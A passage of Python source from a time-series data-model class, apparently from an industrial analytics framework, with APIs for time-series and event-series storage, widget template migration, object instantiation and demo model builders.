self.logger.error("set_column_len: not a column")
return None
#now make the adjustments
if type(self.model[id]['value']) != numpy.ndarray:
self.model[id]['value'] = numpy.full(newLen, numpy.nan)
else:
#is already an array
if len(self.model[id]['value']) == newLen:
#nothing to do
pass
if len(self.model[id]['value']) > newLen:
self.model[id]['value'] = self.model[id]['value'][0:newLen]
elif len(self.model[id]['value']) < newLen:
self.model[id]['value'] = numpy.append(self.model[id]['value'], numpy.full(dataLen-len(self.model[id]['value']), numpy.nan))
else:
#same len
pass
return newLen
def get_upload_folder_files(self, matchFilter=None, blackList = []):
"""
Args:
fileNameMatch: a string that must be contained in the files to deliver
blackList: a list of filenames which should not be delivered
Returns list of files with absolute file names, list of files with fileNames
"""
full_path = os.path.realpath(__file__) # returns a string representing the canonical path, argument file is a file system path
path, filename = os.path.split(full_path)
folder = path+r'\upload'
absFileNames = []
foundFileNames = []
#now iterate the uploaded files
fileNames = os.listdir(folder)
for idx,fileName in enumerate(fileNames):
if matchFilter:
if matchFilter not in fileName:
continue # this file will be ignored
if fileName in blackList:
continue
foundFileNames.append(fileName)
absFileNames = [folder+"\\"+fileName for fileName in foundFileNames]
return foundFileNames,absFileNames
def update(self):
"""
update all known widgets to the latest template including complex backward compatibility changes
:return:
"""
self.logger.info("update() running...")
self.disable_observers()
try:
# the ts widgets:
# now go throught the widget and update all according the template
# now find all type widget
newNodes = {}
helperModel = Model()
helperModel.disable_observers()
helperModel.create_template_from_path("root.widget", self.get_templates()['templates.timeseriesWidget'])
widgets = []
for id, props in self.model.items():
if props["type"] == "widget":
widgetObject = self.get_node(id)
if widgetObject.get_child("widgetType").get_value() == "timeSeriesWidget":
widgets.append(id)
self.logger.debug(f"update():found widget {widgetObject.get_browse_path()}")
for id in widgets:
path = self.get_browse_path(id)
mirrorBefore = self.get_branch_pretty(path)
self.create_template_from_path(path,self.get_templates()['templates.timeseriesWidget']) # this will create all nodes which are not there yet
# now make specific updates e.g. linking of referencers, update of list to dicts etc.
# if colors is a list: make a dict out of it
colors = self.get_value(f"{id}.hasAnnotation.colors")
tags = self.get_value(f"{id}.hasAnnotation.tags")
if type(colors) is list:
colors = {v:{"color":colors[idx],"pattern":None} for idx,v in enumerate(tags)}
self.logger.debug(f"update(): set value{id}.hasAnnotation.colors := {colors} ")
self.set_value(f"{id}.hasAnnotation.colors",colors)
if not "visibleTags" in mirrorBefore["hasAnnotation"] or (self.get_value(f"{id}.hasAnnotation.visibleTags") != mirrorBefore["hasAnnotation"]["visibleTags"][".properties"]["value"]):
#it is different or new, so we created it now
visibleTags = {tag:True for tag in tags}
#make sure that from the colors, we take them as well
updateVisibleTags = {tag:True for tag in colors}
visibleTags.update(updateVisibleTags)
self.set_value(f"{id}.hasAnnotation.visibleTags",visibleTags)
self.logger.debug(f"update(): set value{id}.visibleTagss := {visibleTags} ")
#make sure the hasAnnotation.annotations referencer points to newannotations as well
self.add_forward_refs(f"{id}.hasAnnotation.annotations",[f"{id}.hasAnnotation.newAnnotations"],allowDuplicates=False)
#now make sure the observers have at least the required properties enabled
widget = self.get_node(id)
helperRoot = helperModel.get_node("root.widget")
template = self.get_templates()['templates.timeseriesWidget']
children = helperRoot.get_children(3)
print(f"2 level children {[node.get_browse_path() for node in children]}")
for child in helperRoot.get_children():
if child.get_properties()["type"] == "observer":
widgetNode = widget.get_child(child.get_name()).get_child("properties")
helperNode = child.get_child("properties")
for prop in helperNode.get_value():
current = widgetNode.get_value()
if prop not in current:
current.append(prop)
widgetNode.set_value(current)
for child in helperRoot.get_children(3):
if child.get_properties()["type"] == "referencer":
self.logger.debug(f"found referencer {child.get_name()}")
# now adjust the references of new nodes and of the ones that were there
targets = child.get_properties()["forwardRefs"]
if targets:
targets = [helperModel.get_browse_path(ref) for ref in targets]
requiredTargets = [widget.get_browse_path()+"."+".".join(ref.split(".")[2:]) for ref in targets]
self.logger.debug(f"required targets {requiredTargets}")
#now check in the model
widgetNodePath = widget.get_browse_path()+ child.get_browse_path()[len(helperRoot.get_browse_path()):]
widgetNode = self.get_node(widgetNodePath)
#now check if we have them
targetPaths = [tNode.get_browse_path() for tNode in widgetNode.get_targets()]
for target in requiredTargets:
if target not in targetPaths:
self.logger.debug(f"adding ref {widgetNode.get_browse_path()} => {target}")
self.add_forward_refs(widgetNode.get_id(),[target])
#now the system progress observer
if not self.get_node("root.system.progress"):
self.create_template_from_path("root.system.progress",self.get_templates()['system.observer'])
self.set_value("root.system.progress.hasEvent",True)
self.set_value("root.system.progress.eventString","system.progress")
self.set_value("root.system.progress.properties",["value"])
self.set_value("root.system.progress.enabled",True)
except Exception as ex:
self.logger.error(f" {ex} , {sys.exc_info()[0]}")
helperModel.delete()
helperModel.delete()
self.enable_observers()
# ########################################
# time series api
def time_series_create(self,desc):
id = self.get_id(desc)
return self.ts.create(id)
def time_series_delete(self,desc):
id = self.get_id(desc)
return self.ts.delete(id)
def time_series_insert(self, desc, values=None, times=None, allowDuplicates = False):
id = self.get_id(desc)
if not id in self.model:
return None
with self.lock:
result = self.ts.insert(id,values, times,allowDuplicates=allowDuplicates)
self.__notify_observers(id, "value")
return result
def time_series_append(self, desc, values=None, times=None):
id = self.get_id(desc)
if not id in self.model:
return None
with self.lock:
result = self.ts.append(id,values, times)
self.__notify_observers(id, "value")
return result
def time_series_delete_area(self,desc,start=None,end=None):
id = self.get_id(desc)
if not id in self.model:
return None
with self.lock:
result = self.ts.delete_area(id,start=start,end=end)
self.__notify_observers(id, "value")
return result
def time_series_merge(self, desc, values = None, times = None):
id = self.get_id(desc)
if not id in self.model:
return False
return self.ts.merge(id,values=values,times=times)
def time_series_set(self,desc,values=None,times=None):
id = self.get_id(desc)
if not id in self.model:
return None
if self.lock:
result = self.ts.set(id,values=values,times=times)
self.__notify_observers(id, "value")
return result
def time_series_get_table(self,
variables,
tableDescriptor = None,
start=None,
end=None,
noBins=None,
includeIntervalLimits=False,
resampleTimes=None,
format="default",
toList = False,
resampleMethod = None,
copy=True):
"""
get a time series table from variables (nodes of type "timeseries").
Args:
variables [list of ode descriptors]: nodes to be part the data table requested (ordered!)
tableDescriptor : a desc for the table where the variables reside
possible addressing of te request nodes:
1) ids or browsepaths of nodes (no tableDescriptor needed)
2) names of nodes and tableDescriptor of the table (names must be unique in the columns of the table)
startime, endTime [float]:
the start and endtime of the table given as seconds since epoch
we also allow the special case of endTime = 0 and startTime = -interval
we also allow the special case of startTime given and end time= 0
noBins(int): the number of samples to be returned inside the table between start end endtime,
if None is given, we return all samples (rows) we have in the table and to not aggregate
includeIntervalLimits [bool]: if set to true, we will include one more data point each left and right of the requested time
format: [enum] "default", "flat", see return description
resampleMethod [enum]:
how to resample if we need to; options are:
None (if not specified): sample and hold
"linear": linear interpolation
"linearfill": linear interpolation and also interpolate "nan" or "inf" values in the original data
toList: (bool) True: return data as python list, False: return numpy arrays
examples:
- get all data of the variables
data = m.get_time_series_table(["root.mytable.variables.a","root.mytable.variables.b"]) # get all data
- request max 300 values of data (this is what the UI does)
data = m.get_time_series_table(["a","b"],"root.mytable",start=1581483065.323,end=1581483080.323,noBins=300,includeIntervalLimits=True)
- request data and resample to equiditant 25 sec spacing, also fill possible nan values with interpolation
times = list(range(1581483065,1581483065+100,25))
data = m.get_time_series_table(["a","b"],"root.mytable",resampleTimes = times,resampleMethod = "linearfill")
Returns(dict)
formatting depends on the "format" option
"defaut": return the result as {"var_a":{"values":[],"__time":[]}, "var_b":{"values":[],"__time":[]..}
"flat" return the result as {"var_a":[], "var_a__time":[],"var_b":[],"var_b__time":[]....}
the variable descriptor are the ones given in the request
"__time" : list of timestamps for the returned table in epoch seconds as float64
"values": the list of float values of one of the requested variables
"""
if tableDescriptor:
tableId = self.get_id(tableDescriptor)
tableVars = self.get_leaves(tableId+".columns")
else:
tableId = None
if type(start) is str:
start = date2secs(start)
if type(end) is str:
end = date2secs(end)
with self.lock:
#first check if all requested timeseries exist and have type time series
#vars = [] #self.get_id(variables)
if not type(variables) is list:
variables= [variables]
varIds = {} # NodeId: request descriptor
for var in variables:
varId = self.get_id(var)
if not varId:
#try to find per columns and table desc
found = False
if tableId:
for tableVar in tableVars:
if tableVar["name"] == var:
varId = tableVar["id"]
found = True
break
if not found:
self.logger.error(f"requested variable {var} does not exist")
return False
if self.model[varId]["type"]!="timeseries":
self.logger.error(f"requested variable {var} not timeseries, instead {self.model[varId]['type']}")
return False
varIds[varId]=var #remeber it for later
table = self.ts.get_table(list(varIds.keys()), start=start, end=end, copy=copy, resampleTimes=resampleTimes, noBins = noBins, includeIntervalLimits=includeIntervalLimits,resampleMethod=resampleMethod)
#now wrap back the descriptor to the query, if is was a browsepath, we return and browsepath, if is was an id, we return id
# make some formatting
def convert(input,toList=toList):
if toList:
return list(input)
else:
return input
result = {}
for k,v in table.items():
if format=="flat":
result[varIds[k]]=convert(v["values"])
result[varIds[k]+"__time"]=convert(v["__time"])
else:
result[varIds[k]] = {"values":convert(v["values"]),"__time":convert(v["__time"])}
#if len(variables) == 1:
# #we only have one variable, so we return without descriptor
# result = result[list(result.keys())[0]]
return result
def time_series_get_info(self,name=None):
return self.ts.get_info(name)
def time_series_get_raw(self,id,start=None,end=None):
table = self.ts.get_table([id], start=start, end=end, copy=False, resampleTimes=None,
noBins=None, includeIntervalLimits=False,
resampleMethod=None)
result = table[id]
return result
def time_series_insert_blobs(self, tableDesc, blobs=[]):
""" blob is a dict or list of dicts of key and values containing one time base like
the descriptors of teh variables can be ids, browsepaths or just names (without dots)
if the descriptors are names, we try to find them in the model, they must exist there uniquely, otherwise
they cant be processed
we also autocreate the table or missing variables
the data will be put in a table:
- we try to find the table based on one of the variables, if not found, we create the table
{
"a": [1.5,1.6,1.7]m
"b": [2,3,4]
"__time" :[100001,100002,100003]
}
"""
if not type(blobs) is list:
blobs=[blobs]
#first, find the table
with self.lock:
tableId = self.get_id(tableDesc)
if not tableId:
#try to find the table from the first node
#table not found, create it
tableId = self.create_node_from_path(tableDesc,properties={"type":"table"})
if tableId:
columnsId = self.create_node(parent=tableId, name="columns", properties={"type": "referencer"})
variablesId = self.create_node(parent=tableId, name="variables", properties={"type": "folder"})
else:
self.logger.error(f"cant create table {tableDesc}")
return False
else:
columnsId = self.get_child(tableId,"columns")
variablesId = self.get_child(tableId, "variables")
#now we know the tableId, columnsId, variablesId
# iterate over all blobs and find the ids of the names in the blobs, if not found, create it
# exchange the descriptors to ids
desc2Id = {} # key: the descriptor from the input blob v: the id in the model
tableVars = self.get_leaves(columnsId)
desc2Id = {dic["name"]:dic["id"] for dic in tableVars} # key: the descriptor from the input blob v: the id in the model, preload with the names
#convert all to ids
newBlobs=[]
idsInBlobs=[]
for blob in blobs:
newBlob={}
for k,v in blob.items():
if k=="__time":
newBlob[k]=v
else:
#does this id already exist?
if k in desc2Id:
id = desc2Id[k]
else:
id = None
#try to find
for var in tableVars:
if var["name"] == k:
id = v["id"]
break
if not id:
#still not found, we need to create it
id = self.create_node(parent=variablesId,name=k,properties={"type": "timeseries"})
if not id:
self.logger.error(f"cant find or create {name}")
continue
else:
self.add_forward_refs(columnsId,[id])
desc2Id[k]=id #remember to speed up next time
newBlob[id] = v
idsInBlobs.append(id)
newBlobs.append(newBlob)
self.logger.debug(f"inserting blobs {len(newBlobs)}")
self.__notify_observers(idsInBlobs, "value")
result = self.ts.insert_blobs(newBlobs)
return result
# ########################################
# event series api
def event_series_create(self,desc,map={}):
id = self.get_id(desc)
if "eventMap" in self.model[id]:
self.model[id]["eventMap"].update(map)
else:
self.model[id]["eventMap"]=map.copy()
return self.ts.create(id)
def event_series_get_new_number_entry(self,id):
eventMap = self.model[id]["eventMap"]
numbers = [v for k, v in eventMap.items()]
newNumber = max(numbers)+1
while newNumber in numbers:
newNumber = newNumber+1
return newNumber
def event_series_get_event_number(self, desc, event, autoCreate=True):
id = self.get_id(desc)
if not id:
return None
with self.lock:
eventMap = self.model[id]["eventMap"] # a dict like {"starting":1, "machineStop":2,...}
if type(event) in [str,numpy.str_]:
if event not in [k for k,v in eventMap.items()]:
if not autoCreate:
return None
# we must put a new eventString
if eventMap == {}:
newEventNumber = 1
else:
newEventNumber = self.event_series_get_new_number_entry(id)
self.model[id]["eventMap"][event] = newEventNumber
return newEventNumber
else:
#is a known event string, get the number
return eventMap[event]
else:
#this is a number already, check if it is in the map
eventNumbers = [v for k,v in eventMap.items()]
if event in eventNumbers:
return event
else:
if not autoCreate:
return None
#must create a new entry
try:
#to make sure we have only numbers there
newEventString = "event_"+str(int(event))
self.model[id]["eventMap"][newEventString]=int(event)
except:
self.log_error()
return None
return event
def event_series_insert(self, desc, values=None, times=None, allowEventDuplicates = False):
"""
Args:
values: list of events, where the event is either an eventString or an event number
if values is a scalar, we assume that for all times the same event will be inserted
allowEventDuplicates: set this to true allowes the same events to appear multiple times on the same time
different events are always allowed on the same time
"""
id = self.get_id(desc)
if not id in self.model:
return None
if not values or not times:
return None
if not(type(values) is list or type(values) is numpy.ndarray):
values = [values]*len(times)
#convert the values to numbers and create new map entry if needed
numbers = numpy.asarray([self.event_series_get_event_number(id,event) for event in values],dtype=numpy.int)
#convert the times to epoch if not already done
epochs = numpy.asarray([t if type(t) is not str else date2secs(t) for t in times ],dtype=numpy.float64)
if not allowEventDuplicates:
# we must delete the events which exist already at the same time with the same event
data = self.event_series_get(desc)
takeIndices = numpy.full(len(times),True)
for idx,tim in enumerate(times):
duplicates = numpy.where(data["__time"]==tim)[0]
for pos in duplicates:
if numbers[idx] == data["values"][pos]:
takeIndices[idx] = False
numbers = numbers[takeIndices]
epochs = epochs[takeIndices]
with self.lock:
#on the TimeSeries class the allowDuplicates means that the same time can appear mulitple times
# such that different or the same events can happen at the same time and thus produce the same
# time stamp in the time series
result = self.ts.insert(id,numbers, epochs, allowDuplicates=True)# we allow 2 events to appear on the same time!
self.__notify_observers(id, "value")
return result
def event_series_set(self,desc,values=None,times=None):
id = self.get_id(desc)
if not id in self.model:
return None
if self.lock:
# now "refresh" the event map
#self.model[id]["eventMap"]={}
numbers = [self.event_series_get_event_number(id, event) for event in values]
result = self.ts.set(id,values=numbers,times=times)
self.__notify_observers(id, "value")
return result
def event_series_get(self,desc, start=None,end=None,format="default",eventFilter=None):
"""
get events from a event series
Args:
desc: node descricptor
start , end [float]:
the start and endtime of the table given as seconds since epoch
we also allow the special case of endTime = 0 and startTime = -interval
we also allow the special case of startTime given and end time= 0
format: [enum] "default"
eventFilter : [string] a list of eventStrings as positive match filter
toList: (bool) True: return data as python list, False: return numpy arrays
examples:
- get all data of the variables
data = m.get_time_series_table(["root.mytable.variables.a","root.mytable.variables.b"]) # get all data
- request max 300 values of data (this is what the UI does)
data = m.get_time_series_table(["a","b"],"root.mytable",start=1581483065.323,end=1581483080.323,noBins=300,includeIntervalLimits=True)
- request data and resample to equiditant 25 sec spacing, also fill possible nan values with interpolation
times = list(range(1581483065,1581483065+100,25))
data = m.get_time_series_table(["a","b"],"root.mytable",resampleTimes = times,resampleMethod = "linearfill")
Returns(dict)
formatting depends on the "format" option
"defaut": return the result as {"values":[],"__time":[], "eventstrings": "map":{1:"myevent",2:"anotherevent"}
"""
id = self.get_id(desc)
if not id:
return None
data = self.ts.get_table([id], start=start, end=end)
if data == {}:
#this variable is not in the store
data = {id:{"values":numpy.asarray([]),"__time":numpy.asarray([])}}
eventMap = self.model[id]["eventMap"].copy()
reverseMap = {v:k for k,v in eventMap.items()}
values = data[id]["values"].astype(numpy.int)
times = data[id]["__time"]
#now filter
if eventFilter:
filter = []
if type(eventFilter) is not list:
eventFilter = [eventFilter]
for evString in eventFilter:
if evString in eventMap:
filter.append(eventMap[evString])
indices = [idx for idx,val in enumerate(values) if val in filter]
values = values[indices]
times = times[indices]
result = {
"values":values,
"__time":times,
"eventMap":eventMap,
"eventStrings":[reverseMap[v] for v in values]
}
if format == "iso":
#convert the timestamps to iso
result["__time"]=[epochToIsoString(t) for t in result["__time"]]
if format == "events":
existingEvents = set(result["values"])
events = {reverseMap[ev]:[] for ev in existingEvents}
for ev,ti in zip(result["values"],result["__time"]):
events[reverseMap[ev]].append(ti)
result["events"]=events
del result["values"]
del result["__time"]
del result["eventStrings"]
return result
def event_series_insert_blob(self,blob):
"""
insert events in various blob syntax
Args:
desc: the node descriptor
blob: a dictionary in various styles
a) {
"node": nodedescriptor
"events":"startMachine"
"__time": ["2018.01.01T00:10:08.445+02:00",1546437120.2,1546437121.2,1546437122.2]# allowes iso or epoch
}
b) {
"node": nodedescriptor
"events":["startMachine","stopMachine","startMachine","startMachine]
"__time": ["2018.01.01T00:10:08.445+02:00",1546437120.2,1546437121.2,1546437122.2]# allowes iso or epoch
}
c) "events:[
{"event":"startMachine",
"__time":"2018.01.01T00:10:08.445+02:00"
},
{"event":"stopMachine",
"__time":"2018.01.01T00:10:08.445+02:00"
}
Returns
true/false for success
"""
if type(blob["events"]) is not list:
#style a)
events = blob["events"]
times = blob["__time"]
else:
#events is a list
if type(blob["events"][0]) is dict:
#style c)
events = []
times = []
for d in blob["events"]:
events.append(d["event"])
times.append(d["__time"])
else:
#style b)
events = blob["events"]
times = blob["__time"]
return self.event_series_insert(blob["node"],events,times)
def event_series_delete(self,desc,start=None, end = None, eventsToDelete=[]):
id = self.get_id(desc)
if not id:
return None
if start == None and end == None and eventsToDelete == []:
#delete all
with self.lock:
self.model[id]["eventMap"]={}
result = self.ts.set(id, values=[], times=[])
else:
#delete some events
with self.lock:
data = self.ts.get_table([id])
if not start:
start = 0
if not end:
end = numpy.inf
times = data[id]["__time"]
values = data[id]["values"]
over = times>=start
under = times<=end
deleteMaskTime = over & under
if eventsToDelete == []:
deleteMaskValues = numpy.full(len(deleteMaskTime),True)
else:
deleteMaskValues = numpy.full(len(deleteMaskTime),False)
for ev in eventsToDelete:
evNumber = self.model[id]["eventMap"][ev]
mask = values == evNumber
deleteMaskValues = deleteMaskValues | mask
deleteMask = deleteMaskTime & deleteMaskValues
times = times[~deleteMask]
values = values[~deleteMask]
self.event_series_set(id,values,times)
print(data)
def get_object(self,desc):
id = self.get_id(desc)
if not id:
return False
with self.lock:
if not self.model[id]["type"] == "object":
return None
if "object" not in self.model[id]:
return None
return self.model[id]["object"]
def instantiate_object(self,desc,writeToModel=True):
id = self.get_id(desc)
if not id:
return False
with self.lock:
if not self.model[id]["type"] == "object":
return False
try:
className = self.model[id]["class"]
if "autoReload" in self.model[id] and self.model[id]["autoReload"]==True and self.global_auto_reload_enabled():
# must reload the module
module = importlib.reload(self.objectClasses[className]["module"])
classDefinition = getattr(module, className.split('.', 1).pop())
# now update our global list
self.objectClasses[className]["module"] = module
self.objectClasses[className]["class"] = classDefinition
classDefinition = self.objectClasses[className]["class"]
object = classDefinition(self.get_node(id)) #instantiate the object
if writeToModel:
self.model[id]["object"]=object
return object
except:
self.log_error()
return None
def instantiate_all_objects(self):
with self.lock:
#make a list first for iteration, we can't iterate over the model,
# as the instantiation of object might produce new nodes while we iterate
objects = [k for k,v in self.model.items() if v["type"] == "object"]
for id in objects:
try:
self.instantiate_object(id)
except:
self.log_error()
def reset_all_objects(self):
with self.lock:
#make a list first for iteration, we can't iterate over the model,
# as the instantiation of object might produce new nodes while we iterate
objects = [k for k,v in self.model.items() if v["type"] == "object"]
for id in objects:
try:
self.get_object(id).reset(None)
except:
self.log_error()
def global_auto_reload_enabled(self):
if self.get_value("root.system.enableAutoReload") == False:
return False
else:
return True # this will also be the case if the node is not there, as the get_value return None then
def create_test(self,testNo=1):
"""
this functions crates tests for demostrating purposes
"""
if testNo == 1:
self.create_node("root",name="variables",type="folder")
for var in ["f0","f1","f2","f3","count","time","back"]:
self.create_node("root.variables",name=var,type="column")
self.create_node_from_path('root.folder2.myconst',{"type":"const","value":"21data"})
self.create_node_from_path('root.folder2.myfkt', {"type": "function"})
#for the visu
self.create_node_from_path('root.visualization.pipelines.occupancy.url',{"type":"const","value":"http://localhost:5006/bokeh_web"})
self.create_node_from_path('root.visualization.pipelines.demo2.url',{"type":"const","value":"http://21data.io"})
#create an official table
template = [
{
"name": "description",
"type": "const",
"value": "this is a great table"
},
{
"name": "columns",
"type": "referencer",
},
{
"name": "timeField",
"type": "referencer",
},
{
"name": "numberOfRows",
"type": "variable",
"value": 0
}
]
self.create_node("root", name="mytable", type="table")
self.create_nodes_from_template("root.mytable", template=template)
for var in ["f0","f1","f2","f3","time","back"]:
self.add_forward_refs("root.mytable.columns",["root.variables."+var])
self.add_forward_refs("root.mytable.timeField", ["root.variables.time"])
#add data
startTime=datetime.datetime(2018,1,1,0,0,0,tzinfo=pytz.UTC)
vars={"f0":0.01,"f1":0.02,"f2":0.04,"f3":0.1,"back":0.01}
SIZE = 10*60 # in seconds units
STEP = 0.1
#!!! we are producing size/step time points
""" for i in range(SIZE):
dataDict = {}
for var in vars:
value = numpy.cos(2*numpy.pi*vars[var]*i/SIZE*3)
dataDict["root.variables."+var]=value
mytime = startTime + datetime.timedelta(seconds = i)
dataDict["root.variables.time"] = mytime
#print(mytime)
self.add_timeseries(dataDict)
"""
startEpoch = date2secs(startTime)
times = numpy.arange(startEpoch,startEpoch+SIZE,STEP,dtype=numpy.float64)
print("we have time:",times.shape)
for var in vars:
values = numpy.cos(2*numpy.pi*vars[var]*times)
id=self.get_id("root.variables."+str(var))
if var =="back":
#we make -1,0,1 out of it
values = numpy.round(values)
self.model[id]["value"]=values.tolist()
id = self.get_id("root.variables.time")
self.model[id]["value"]=(times).tolist()
#now correct the background
#now make some widget stuff
self.create_node_from_path('root.visualization.widgets.timeseriesOne',{"type":"widget"})
self.create_node_from_path('root.visualization.widgets.timeseriesOne.selectableVariables',
{"type":"referencer"})
self.create_node_from_path('root.visualization.widgets.timeseriesOne.selectedVariables',
{"type": "referencer"})
self.create_node_from_path('root.visualization.widgets.timeseriesOne.startTime',
{"type": "variable","value":None})
self.create_node_from_path('root.visualization.widgets.timeseriesOne.endTime',
{"type": "variable","value":None})
self.create_node_from_path('root.visualization.widgets.timeseriesOne.bins',
{"type": "const","value":300})
self.create_node_from_path('root.visualization.widgets.timeseriesOne.hasAnnotation',
{"type": "const", "value": True})
self.create_node_from_path('root.visualization.widgets.timeseriesOne.hasSelection',
{"type": "const", "value": False})
self.create_node_from_path('root.visualization.widgets.timeseriesOne.hasAnnotation.annotations',
{"type": "referencer"})
self.create_node_from_path('root.visualization.widgets.timeseriesOne.hasAnnotation.newAnnotations',
{"type": "folder"})
self.create_node_from_path('root.visualization.widgets.timeseriesOne.hasAnnotation.tags',
{"type": "const","value":["one","two"]})
self.create_node_from_path('root.visualization.widgets.timeseriesOne.hasAnnotation.colors',
{"type": "const","value":["yellow","brown","greay","green","red"]})
self.create_node_from_path('root.visualization.widgets.timeseriesOne.table',
{"type": "referencer"})
self.create_node_from_path('root.visualization.widgets.timeseriesOne.lineColors',
{"type": "const", "value": ["blue", "yellow", "brown", "grey", "red"]})
self.add_forward_refs('root.visualization.widgets.timeseriesOne.selectedVariables',['root.variables.f0','root.variables.f1','root.variables.f3'])
self.add_forward_refs('root.visualization.widgets.timeseriesOne.selectableVariables',['root.variables'])
self.add_forward_refs('root.visualization.widgets.timeseriesOne.table',['root.mytable'])
self.create_node_from_path('root.visualization.widgets.timeseriesOne.observer',{"type":"referencer"})
self.create_node_from_path('root.visualization.widgets.timeseriesOne.observerUpdate', {"type": "const","value":["line","background","annotations"]})
#now the annotations
anno = [
{
"name": "tags",
"type": "const",
"value": ["one","two"]
},
{
"name": "startTime",
"type": "const",
"value": None
},
{
"name": "endTime",
"type": "const",
"value": None
},
{
"name": "text",
"type": "const",
"value": "this is a great annotation"
}
]
tags=["one","two","one","one","two","two","one","one","one","two","one","one"]
self.create_node_from_path("root.annotations",{"type":"folder"})
startTime = datetime.datetime(2018, 1, 1, 0, 0, 0, tzinfo=pytz.UTC)
for i in range(10):
newAnno = copy.deepcopy(anno)
newAnno[1]["value"] = (startTime + datetime.timedelta(minutes=(i*10))).isoformat()
newAnno[2]["value"] = (startTime + datetime.timedelta(minutes=(i*10+1))).isoformat()
newAnno[0]["value"] = [tags[i],tags[i+1]]
newAnnoPath = "root.annotations.anno"+str(i)
self.create_node_from_path(newAnnoPath,{"type":"annotation"})
self.create_nodes_from_template(newAnnoPath,newAnno)
#also add the annotations to the widget
self.add_forward_refs("root.visualization.widgets.timeseriesOne.hasAnnotation.annotations",["root.annotations","root.visualization.widgets.timeseriesOne.hasAnnotation.newAnnotations"])
#make a real function
self.create_node_from_path("root.functions",{"type":"folder"})
self.create_nodes_from_template("root.functions",[self.templates["testfunction.delayFunctionTemplate"]])
#now make cutom function to trigger something
self.create_nodes_from_template("root.functions",[self.templates["counterfunction.counterFunctionTemplate"]])
#now hook the function output to the observer of the plot
self.add_forward_refs('root.visualization.widgets.timeseriesOne.observer',['root.functions.counterFunction.output'])
#now make custom buttons
buttons = [
{
"name":"button1",
"type":"folder",
"children":[
{"name":"caption","type":"const","value":"start learner"},
{"name":"counter", "type": "variable", "value":0},
{"name": "onClick", "type": "referencer"}
]
}
]
self.create_node_from_path("root.visualization.widgets.timeseriesOne.buttons",{"type":"folder"})
self.create_nodes_from_template("root.visualization.widgets.timeseriesOne.buttons",buttons)
self.add_forward_refs("root.visualization.widgets.timeseriesOne.buttons.button1.onClick",["root.functions.counterFunction"])
#now the backgrounds
self.create_node_from_path("root.visualization.widgets.timeseriesOne.hasBackground",{"type":"const","value":True})
self.create_node_from_path("root.visualization.widgets.timeseriesOne.background",{"type":"referencer"})
self.add_forward_refs("root.visualization.widgets.timeseriesOne.background",["root.variables.back"])
self.create_node_from_path("root.visualization.widgets.timeseriesOne.backgroundMap",{"type":"const","value":{"1":"red","0":"green","-1":"blue","default":"white"}})
self.show()
elif testNo == 2:
#we take the full test number 1 and rearrange some things
self.create_test(1)
self.currentModelName = "occupancydemo"
import data.occupancy_data.occupancy as occ
occData = occ.read_occupancy("./data/occupancy_data/datatest2.txt")
#create an official table
template = [
{
"name": "description",
"type": "const",
"value": "this is the occupancy data table"
},
{
"name": "columns",
"type": "referencer",
},
{
"name": "timeField",
"type": "referencer",
},
{
"name": "variables",
"type": "folder",
}
]
self.create_node("root", name="occupancy", type="table")
self.create_nodes_from_template("root.occupancy", template=template)
for var in occData:
path = "root.occupancy.variables."+var
self.create_node_from_path(path,{"type":"column"})
self.set_value(path,occData[var])
self.add_forward_refs("root.occupancy.columns",[path])
self.add_forward_refs("root.occupancy.timeField",["root.occupancy.variables.date"])
#now create the classification
self.create_node("root.occupancy", name="classification", type="column")
self.set_value("root.occupancy.classification", [0]*len(occData[list(occData.keys())[0]]))
self.add_forward_refs("root.occupancy.columns", ["root.occupancy.classification"])
#create another TS-widget
self.create_node_from_path('root.visualization.widgets.timeseriesOccupancy', {"type": "widget"})
self.create_nodes_from_template('root.visualization.widgets.timeseriesOccupancy',modeltemplates.timeseriesWidget)
self.create_nodes_from_template('root.visualization.widgets.timeseriesOccupancy.buttons.button1',modeltemplates.button)
self.add_forward_refs('root.visualization.widgets.timeseriesOccupancy.selectedVariables',["root.occupancy.variables.Temperature"])
self.add_forward_refs('root.visualization.widgets.timeseriesOccupancy.selectableVariables',["root.occupancy.variables"])
self.add_forward_refs('root.visualization.widgets.timeseriesOccupancy.table',['root.occupancy'])
self.add_forward_refs('root.visualization.widgets.timeseriesOccupancy.background',['root.occupancy.classification'])
self.set_value('root.visualization.widgets.timeseriesOccupancy.backgroundMap', {"0": "brown", "1": "yellow", "-1": "blue", "default": "white"}) #match annotation colors
#self.set_value('root.visualization.widgets.timeseriesOccupancy.backgroundMap', {"0": "blue", "1": "black", "-1": "blue", "default": "white"}) #match annotation colors
self.set_value('root.visualization.widgets.timeseriesOccupancy.hasAnnotation.tags',["busy","free"])
#now create the logistic regression
self.create_nodes_from_template('root',[self.templates["logisticregression.logisticRegressionTemplate"]])
self.add_forward_refs('root.logisticRegression.input',['root.occupancy.variables.Temperature', 'root.occupancy.variables.Light','root.occupancy.variables.CO2'])
self.add_forward_refs('root.logisticRegression.output', ['root.occupancy.classification'])
self.add_forward_refs('root.logisticRegression.annotations',['root.visualization.widgets.timeseriesOccupancy.hasAnnotation.newAnnotations'])
self.set_value('root.logisticRegression.categoryMap', {"busy": 1, "free": 0})
#also hook the button on it
self.add_forward_refs('root.visualization.widgets.timeseriesOccupancy.buttons.button1.onClick',['root.logisticRegression'])
self.add_forward_refs('root.visualization.widgets.timeseriesOccupancy.observer',['root.logisticRegression.executionCounter']) # observe the execution of the scorer
self.show()
elif testNo == 3:
# make some nodes
for id in range(10):
self.create_node_from_path("root.add.var"+str(id), {"type": "variable", "value": id+100})
for id in range(100):
self.create_node_from_path("root.remove.var"+str(id), {"type": "variable", "value": id+100})
self.create_node_from_path("root.change_name_one")
self.create_node_from_path("root.change_value")
self.create_node_from_path("root.move.first")
self.create_node_from_path("root.move.second")
self.create_node_from_path("root.refs",properties={"type":"referencer"})
self.add_forward_refs("root.refs",["root.move.first","root.move.second","root.move"])
#now start a thread that changes the tree periodically
def __update_tree():
while True:
time.sleep(3.0)
with self.lock:
self.logger.debug("__update_tree")
self.create_node_from_path("root.add.dyn"+str(uuid.uuid4()))
removeFolder = self.get_id("root.remove")
if self.model[removeFolder]["children"]:
self.delete_node(self.model[removeFolder]["children"][0])
id = self.get_id("root.change_name_one")
if id:
self.model[id]["name"]="change_name_two"
else:
id = self.get_id("root.change_name_two")
self.model[id]["name"]="change_name_one"
id = self.get_id("root.move")
self.model[id]["children"].reverse()
id=self.get_id("root.refs")
self.model[id]["forwardRefs"].reverse()
self.set_value("root.change_value",int(uuid.uuid4())%100)
self.testThread = threading.Thread(target=__update_tree)
self.testThread.start()
if __name__ == '__main__':
def test1():
m=Model()
m.create_node("root",name="folder1")
m.create_node("root.folder1",name="folder2")
